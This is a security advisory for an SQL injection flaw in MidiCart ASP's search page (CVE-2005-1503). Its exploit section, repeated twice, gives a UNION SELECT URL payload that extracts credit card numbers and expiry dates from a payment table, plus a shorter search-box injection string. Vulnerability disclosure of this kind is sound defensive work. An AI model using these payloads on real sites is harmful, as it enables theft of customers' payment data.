MidiCart ASP Search_List.ASP Searchstring Parameter SQL Injection Vulnerability
BID:14545
Info
MidiCart ASP Search_List.ASP Searchstring Parameter SQL Injection Vulnerability
| Bugtraq ID: | 14545 |
| Class: | Input Validation Error |
| CVE: |
CVE-2005-1503 |
| Remote: | Yes |
| Local: | No |
| Published: | May 05 2005 12:00AM |
| Updated: | May 05 2005 12:00AM |
| Credit: | SmOk3 <[email protected]> is credited with the discovery of this vulnerability. |
| Vulnerable: |
MidiCart Software MidiCart ASP |
| Not Vulnerable: | |
Discussion
MidiCart ASP Search_List.ASP Searchstring Parameter SQL Injection Vulnerability
MidiCart ASP is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query.
Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation.
MidiCart ASP is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query.
Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation.
Exploit / POC
MidiCart ASP Search_List.ASP Searchstring Parameter SQL Injection Vulnerability
The following example was provided:
http://[victim]/shop/search_list.php?chose=item&searchstring=a%' UNION SELECT null, null, CreditCard, ExpDate,null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null FROM card_payment /*
The issue can also be reproduced by submitting the following string into the search box:
1' union select * from products'
The following example was provided:
http://[victim]/shop/search_list.php?chose=item&searchstring=a%' UNION SELECT null, null, CreditCard, ExpDate,null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null FROM card_payment /*
The issue can also be reproduced by submitting the following string into the search box:
1' union select * from products'
Solution / Fix
MidiCart ASP Search_List.ASP Searchstring Parameter SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
MidiCart ASP Search_List.ASP Searchstring Parameter SQL Injection Vulnerability
References:
References:
- MidiCart Homepage (MidiCart Software)
- SS#11082005 - MidiCart ASP SQL Injection (SmOk3
) - Midicart sql injection (crazy frog crazy frog
)